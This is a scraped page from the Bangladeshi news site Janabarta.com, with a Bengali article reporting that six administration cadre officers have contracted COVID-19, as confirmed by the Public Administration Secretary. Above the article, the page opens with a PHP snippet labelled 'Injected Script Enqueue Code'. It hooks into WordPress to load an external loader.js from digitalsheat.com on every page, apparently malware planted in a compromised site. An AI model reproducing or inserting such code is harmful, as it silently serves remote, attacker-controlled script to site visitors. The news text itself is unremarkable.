// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনায় আক্রান্ত প্রশাসন ক্যাডারের ৬ কর্মকর্তা - Janabarta.com

করোনায় আক্রান্ত প্রশাসন ক্যাডারের ৬ কর্মকর্তা

নিজস্ব প্রতিবেদক: দেশে ব্যাপকভাবে ছড়িয়ে পড়তে শুরু করেছে মরণঘাতী করোনাভাইরাস। সংক্রমিত হচ্ছেন সাধারণ মানুষ থেকে শুরু করে চিকিৎসক, নার্স, স্বাস্থকর্মী, পুলিশ ও প্রশাসনের কর্মকর্তারাও। বাদ যাচ্ছে না শিশু থেকে বৃদ্ধ, ধনী থেকে গরীব, মুসলিম-হিন্দু কেউই।

জানা গেছে, প্রশাসন ক্যাডারে এখন পর্যন্ত ছয় জন কর্মকর্তা করোনাভাইরাসে সংক্রমিত হয়েছেন। আজ রোববার গণমাধ্যমকে তথ্যটি নিশ্চিত করেছেন জনপ্রশাসন সচিব শেখ ইউসুফ হারুন।

তিনি বলেন, সংক্রমিতদের মধ্যে নায়ায়ণগঞ্জে তিন জন, গাজীপুর ও ভৈরবে এক জন করে এবং জেদ্দাস্থ বাংলাদেশ মিশনের এক জন শ্রম কাউন্সেলর আছেন।

তাদের চিকিৎসা দিতে সর্বোচ্চ ব্যবস্থা নেয়া হয়েছে জানিয়ে তিনি বলেন, এই কর্মকর্তাদের সংস্পর্শে যারা ছিলেন, তাদেরও হোম কোয়ারেন্টাইনে পাঠানো হয়েছে।

এ সময় নিজেদের সর্বোচ্চ সুরক্ষা নিশ্চিত করে ও সতর্কতার সহিত কাজ করতে মাঠ প্রশাসনকে আগেই নির্দেশনা দেয়া হয়েছে বলে জানান জনপ্রশাসন সচিব।

এর আগে গত ৬ এপ্রিল ভাইরাসটিতে সংক্রমিত হয়ে প্রশাসন ক্যাডারের ২২তম ব্যাচের কর্মকর্তা ও দুর্নীতি দমন কমিশনের (দুদক) পরিচালক জালাল সাইফুর রহমান মৃত্যুবরণ করেন।